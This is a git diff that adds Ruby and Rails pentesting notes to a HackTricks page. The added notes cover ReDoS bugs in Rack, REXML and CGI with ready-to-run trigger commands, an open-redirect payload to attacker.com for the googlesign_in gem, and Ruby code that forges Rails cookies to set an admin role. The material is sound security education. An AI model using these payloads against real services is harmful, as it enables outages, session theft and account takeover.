Merge branch 'master' of github.com:HackTricks-wiki/hacktricks

carlospolop · carlospolop · commit d66b4064cace · 2026-02-05T00:42:43.000+01:00
diff --git a/src/network-services-pentesting/pentesting-web/ruby-tricks.md b/src/network-services-pentesting/pentesting-web/ruby-tricks.md
@@ -41,11 +41,60 @@ If the target stack uses Rack middleware directly or via frameworks, versions of
 
 - Mitigation: upgrade Rack; ensure `:root` only points to a directory of public files and is explicitly set.
 
+## Rack multipart parser ReDoS / request smuggling (CVE-2024-25126)
+
+Rack < `3.0.9.1` and < `2.2.8.1` spent super-linear time parsing crafted `Content-Type: multipart/form-data` headers. A single POST with a gigantic `A=` parameter list can peg a Puma/Unicorn worker and cause DoS or request queue starvation.
+
+- Quick PoC (will hang one worker):
+  ```bash
+  python - <<'PY'
+import requests
+h = {'Content-Type': 'multipart/form-data; ' + 'A='*5000}
+requests.post('http://target/', data='x', headers=h)
+PY
+  ```
+- Works against any Rack-based stack (Rails/Sinatra/Hanami/Grape). If fronted by nginx/haproxy with keep-alive, repeat in parallel to exhaust workers.
+- Patched by making parser linear; look for `rack` gem version < `3.0.9.1` or < `2.2.8.1`. In assessments, point out that WAFs rarely block this because the header is syntactically valid.
+
+## REXML XML parser ReDoS (CVE-2024-49761)
+
+The REXML gem < 3.3.9 (Ruby 3.1 and earlier) catastrophically backtracks when parsing hex numeric character references containing long digit runs (e.g., `&#1111111111111x41;`). Any XML processed by REXML or libraries that wrap it (SOAP/XML API clients, SAML, SVG uploads) can be abused for CPU exhaustion.
+
+Minimal trigger against a Rails endpoint that parses XML:
+```bash
+curl -X POST http://target/xml -H 'Content-Type: application/xml' \
+  --data '<?xml version="1.0"?><r>&#11111111111111111111111111x41;</r>'
+```
+If the process stays busy for seconds and worker CPU spikes, it is likely vulnerable. Attack is low bandwidth and affects background jobs that ingest XML as well.
+
+## CGI cookie parsing / escapeElement ReDoS (CVE-2025-27219 & CVE-2025-27220)
+
+Apps using the `cgi` gem (default in many Rack stacks) can be frozen with a single malicious header:
+- `CGI::Cookie.parse` was super-linear; huge cookie strings (thousands of delimiters) trigger O(N²) behavior.
+- `CGI::Util#escapeElement` regex allowed ReDoS on HTML escaping.
+
+Both issues are fixed in `cgi` 0.3.5.1 / 0.3.7 / 0.4.2. For pentests, drop a massive `Cookie:` header or feed untrusted HTML to helper code and watch for worker lockup. Combine with keep-alive to amplify.
+
+## Basecamp `googlesign_in` open redirect / cookie flash leak (CVE-2025-57821)
+
+The `googlesign_in` gem < 1.3.0 (used for Google OAuth on Rails) performed an incomplete same-origin check on the `proceedto` parameter. A malformed URL like `proceedto=//attacker.com/%2F..` bypasses the check and redirects the user off-site while preserving Rails flash/session cookies.
+
+Exploit flow:
+1. Victim clicks crafted Google Sign-In link hosted by attacker.
+2. After authentication, the gem redirects to attacker-controlled domain, leaking flash notices or any data stored in cookies scoped to the wildcard domain.
+3. If the app stores short-lived tokens or magic links in flash, this can be turned into account takeover.
+
+During testing, grep Gemfile.lock for `googlesign_in` < 1.3.0 and try malformed `proceedto` values. Confirm via Location header and cookie reflection.
+
 ## Forging/decrypting Rails cookies when `secret_key_base` is leaked
 
 Rails encrypts and signs cookies using keys derived from `secret_key_base`. If that value leaks (e.g., in a repo, logs, or misconfigured credentials), you can usually decrypt, modify, and re-encrypt cookies. This often leads to authz bypass if the app stores roles, user IDs, or feature flags in cookies.
 
 Minimal Ruby to decrypt and re-encrypt modern cookies (AES-256-GCM, default in recent Rails):
+
+<details>
+<summary>Ruby to decrypt/forge cookies</summary>
+
 ```ruby
 require 'cgi'
 require 'json'
@@ -70,6 +119,8 @@ plain['role'] = 'admin' if plain.is_a?(Hash)
 forged = enc.encrypt_and_sign(plain)
 puts "Forged cookie: #{CGI.escape(forged)}"
 ```
+
+</details>
 Notes:
 - Older apps may use AES-256-CBC and salts `encrypted cookie` / `signed encrypted cookie`, or JSON/Marshal serializers. Adjust salts, cipher, and serializer accordingly.
 - On compromise/assessment, rotate `secret_key_base` to invalidate all existing cookies.
@@ -168,12 +219,13 @@ URL-encoded PoC (first char is a newline):
 
 ## References
 
-- Rails Security Announcement: CVE-2025-24293 Active Storage unsafe transformation methods (fixed in 7.1.5.2 / 7.2.2.2 / 8.0.2.1). https://discuss.rubyonrails.org/t/cve-2025-24293-active-storage-allowed-transformation-methods-potentially-unsafe/89670
-- GitHub Advisory: Rack::Static Local File Inclusion (CVE-2025-27610). https://github.com/advisories/GHSA-7wqh-767x-r66v
+- [Rails Security Announcement: CVE-2025-24293 Active Storage unsafe transformation methods (fixed in 7.1.5.2 / 7.2.2.2 / 8.0.2.1)](https://discuss.rubyonrails.org/t/cve-2025-24293-active-storage-allowed-transformation-methods-potentially-unsafe/89670)
+- [GitHub Advisory: Rack::Static Local File Inclusion (CVE-2025-27610)](https://github.com/advisories/GHSA-7wqh-767x-r66v)
 - [Hardware Monitor Dojo-CTF #44: Log Injection to Ruby RCE (YesWeHack Dojo)](https://www.yeswehack.com/dojo/dojo-ctf-challenge-winners-44)
 - [Ruby Pathname.cleanpath docs](https://docs.ruby-lang.org/en/3.4/Pathname.html#method-i-cleanpath)
 - [Ruby Logger](https://ruby-doc.org/stdlib-2.5.1/libdoc/logger/rdoc/Logger.html)
 - [How Ruby load works](https://blog.appsignal.com/2023/04/19/how-to-load-code-in-ruby.html)
+- [Rack multipart ReDoS advisory (CVE-2024-25126)](https://www.cve.news/cve-2024-25126/)
+- [Ruby security advisories for CGI / URI (CVE-2025-27219/27220/27221)](https://www.ruby-lang.org/en/news/2025/02/26/security-advisories/)
 
 {{#include ../../banners/hacktricks-training.md}}
-
